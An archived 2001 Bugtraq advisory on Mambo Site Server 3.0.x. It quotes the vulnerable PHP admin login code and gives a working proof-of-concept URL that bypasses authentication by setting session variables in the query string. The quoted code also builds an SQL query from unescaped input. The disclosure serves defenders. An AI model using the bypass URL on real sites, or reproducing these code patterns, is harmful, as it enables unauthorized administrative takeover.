[21839] in bugtraq


Serious security hole in Mambo Site Server version 3.0.X

daemon@ATHENA.MIT.EDU (root (Reverse))
Wed Jul 25 11:52:02 2001

Message-ID: <002101c114fe$d705e120$020000c0@komu>
From: "root (Reverse)" <root@reverseonline.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 25 Jul 2001 13:42:09 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Serious security hole in Mambo Site Server version 3.0.X
Jul 24, 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com

Summary
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.

Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5

Immune systems:

Impact:
Any user can gain administrator privileges.

Exploits:

Under the 'administrator/' directory we found that index.php checks the username and
password:

if (isset($submit)){
  $query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
  $result = $database->openConnectionWithReturn($query);
  if (mysql_num_rows($result)!= 0){
   list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

   .....

   if (strcmp($dbpass,$pass)) {
    //if the password entered does not match the database record ask user to login again
    print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
   }else {
    //if the password matches the database
    if ($remember!="on"){
     //if the user does not want the password remembered and the cookie is set, delete the cookie
     if ($passwordcookie!=""){
      setcookie("passwordcookie");
      $passwordcookie="";
     }
    }
    //set up the admin session then take the user into the admin section of the site
    session_register("myname");
    session_register("fullname");
    session_register("userid");
    print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
    print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";

   }
  }else {
   print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
  }
}

As we can see, if the password for the administrator matches the one in the
database, some variables are registered in the session and we are redirected
to index2.php... so let's take a look at index2.php:

if (!$PHPSESSID){
 print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
 exit(0);
}
else {
 session_start();
 if (!$myname) session_register("myname");
 if (!$fullname) session_register("fullname");
 if (!$uid) session_register("userid");
}

Here we can see that the only check for a valid user is whether the global
variable PHPSESSID is set, so if we declare that variable in the URL and also set
'myname', 'fullname' and 'userid' there, we can gain administrative control... so
we'll test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

BINGO!! Now we have full administrative privileges... that's a typical
example of PHP hacking. It's clear that security can't rely on global
variables, since they may be modified through URL parsing.

Ismael Peinado Palomo
Chief R&D Engineer
postmaster@reverseonline.com
www.reverseonline.com
